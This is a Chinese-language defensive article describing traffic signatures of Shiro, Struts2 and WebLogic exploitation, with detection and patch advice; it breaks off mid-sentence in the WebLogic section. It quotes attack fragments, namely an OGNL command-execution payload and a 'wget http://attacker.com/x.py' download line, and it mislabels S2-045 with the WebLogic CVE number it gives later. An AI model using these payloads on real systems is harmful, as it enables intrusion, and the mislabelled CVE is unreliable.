shiro、struts2、weblogic特征流量分析

一、Shiro漏洞流量特征

核心漏洞：Shiro-550（CVE-2016-4437）与Shiro-721（Padding Oracle攻击）

1. 身份验证阶段的特征

• 登录失败：返回包必含 Set-Cookie: rememberMe=deleteMe，无论是否勾选“记住我”。
• 登录成功：勾选“记住我”时，请求包持续携带长文本rememberMe字段；未勾选时仅返回包出现deleteMe。
• 框架探测：工具爆破时主动添加Cookie: rememberMe=yes，通过返回包是否含deleteMe判断Shiro存在。

2. 攻击阶段的特征

• 密钥爆破：
  • 失败：返回rememberMe=deleteMe；
  • 成功：返回包无deleteMe，且设置新rememberMe值（长度较短）。
• 反序列化攻击：
  • Shiro-550：rememberMe值异常长（Base64编码的AES加密反序列化数据），响应包含Base64加密的命令回显。
  • Shiro-721：利用有效Cookie爆破密钥，攻击包中rememberMe长度剧增，成功时触发DNSLog请求。
• 内存马注入：rememberMe值超长，响应包出现$$$等蚁剑/冰蝎连接特征。

3. 检测与防御建议

• 检测：监控rememberMe长度突变、deleteMe高频返回、DNSLog域名请求。
• 防御：升级Shiro≥1.2.5（550）或≥1.4.2（721），禁用硬编码密钥，开启AES-GCM加密模式。

---

二、Struts2漏洞流量特征

典型漏洞：S2-045（CVE-2017-10271）、S2-016（命令执行）

1. 请求特征

• OGNL注入位置：
  • 头部注入：如S2-045在Content-Type插入恶意OGNL表达式（如 %{(#_='multipart/form-data')）。
  • 参数注入：S2-016在URL参数拼接redirect:${@java.lang.Runtime@getRuntime().exec('id')}。
• 编码混淆：使用Unicode或URL编码绕过检测（如 \u0023 代替 #）。

2. 响应特征

• 攻击成功：
  • 状态码500，返回Java栈错误（如 ognl.OgnlException）；
  • 命令执行成功时回显命令输出（如 uid=0(root)）。
• 横向攻击痕迹：漏洞利用后常下载恶意脚本（如 wget http://attacker.com/x.py），并发动SYN Flood等攻击。

3. 典型案例

某企业服务器因Struts2漏洞被植入Perl脚本，持续向意大利IP（62.149.175.81）发送SYN包，导致防火墙CPU飙升至80%。

4. 防御建议

• 禁用动态方法调用（struts.enable.DynamicMethodInvocation=false）。
• 升级至Struts 2.5.26+，过滤OGNL表达式关键词（如 #、@）。

---

三、WebLogic漏洞流量特征

关键漏洞：XMLDecoder反序列化（CVE-2017-10271）、SSRF（CVE-2014-4210）

1. XMLDecoder反序列化（CVE-2017-10271）

• 请求特征：
  • 路径访问 /wls-wsat/*PortType（如 /CoordinatorPortType）；
  • POST包含恶意XML标签（如